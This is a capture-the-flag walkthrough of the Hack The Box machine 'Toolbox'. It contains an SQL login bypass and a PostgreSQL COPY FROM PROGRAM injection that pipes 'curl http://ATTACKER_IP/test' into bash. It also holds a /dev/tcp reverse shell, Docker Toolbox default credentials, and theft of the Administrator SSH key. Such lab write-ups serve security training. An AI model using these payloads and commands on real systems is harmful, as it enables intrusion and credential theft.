Toolbox is a hybrid Windows/Linux machine that exposes an SQL‑injectable login panel backed by PostgreSQL. The SQL injection allows command execution, giving a shell inside a Docker container. From there, the Docker Toolbox architecture reveals a VirtualBox‑based Docker host with default credentials. The host exposes the Windows filesystem, allowing retrieval of the Administrator SSH key and full compromise.
Target: toolbox.htb
Initial vector: PostgreSQL SQL injection → RCE
Lateral movement: Docker Toolbox VM (default creds)
Privilege escalation: Windows Administrator SSH key from shared folder
Nmap:
21/tcp ftp (anonymous allowed) 22/tcp ssh (OpenSSH for Windows) 443/tcp https (Apache 2.4.38) 445/tcp smb 5985/tcp WinRM
Anonymous FTP reveals:
docker-toolbox.exe
This strongly suggests the host uses Docker Toolbox, which runs Docker inside a VirtualBox VM and exposes Windows folders to the VM.
The HTTPS site presents two domains:
megalogistic.com admin.megalogistic.com
Add both to /etc/hosts.
The admin panel at admin.megalogistic.com contains a login form vulnerable to SQL injection.
Test the login form:
admin' or 1=1-- -
This bypasses authentication. Logging out reveals an error message referencing PostgreSQL, confirming the backend DBMS.
PostgreSQL allows command execution via COPY ... FROM PROGRAM.
Use Burp to intercept a login request and inject:
username=admin'; COPY cmd_exec FROM PROGRAM 'curl http://ATTACKER_IP/test | bash'; -- - &password=admin
Serve a reverse shell script:
#!/bin/bash bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1
Listener:
$ nc -nlvp 443
Trigger the request and a shell is obtained — inside a Docker container.
Check the container’s IP:
$ ifconfig -> 172.17.0.2
Docker Toolbox uses VirtualBox, and the Docker host is always at:
172.17.0.1
Test SSH connectivity:
$ echo '' > /dev/tcp/172.17.0.1/22 && echo OPEN
Default Docker Toolbox credentials:
docker : tcuser
SSH into the Docker host:
$ ssh docker@172.17.0.1 Password: tcuser
The Docker VM automatically mounts the Windows host’s C:\Users directory under:
/c/Users
Navigate to the Administrator folder:
$ cd /c/Users/Administrator/.ssh
Retrieve id_rsa and copy it to your attacker machine:
$ scp docker@172.17.0.1:/c/Users/Administrator/.ssh/id_rsa . $ chmod 600 id_rsa
SSH directly into the Windows host:
$ ssh -i id_rsa administrator@toolbox.htb
Administrator access obtained. Root flag is located on the Windows desktop.
Toolbox is a clever hybrid machine: PostgreSQL SQL injection leads to RCE inside a Docker container, which in turn exposes a VirtualBox‑based Docker Toolbox VM with default credentials. Because the VM mounts the Windows host’s user directories, the Administrator SSH key is easily recovered, resulting in full system compromise.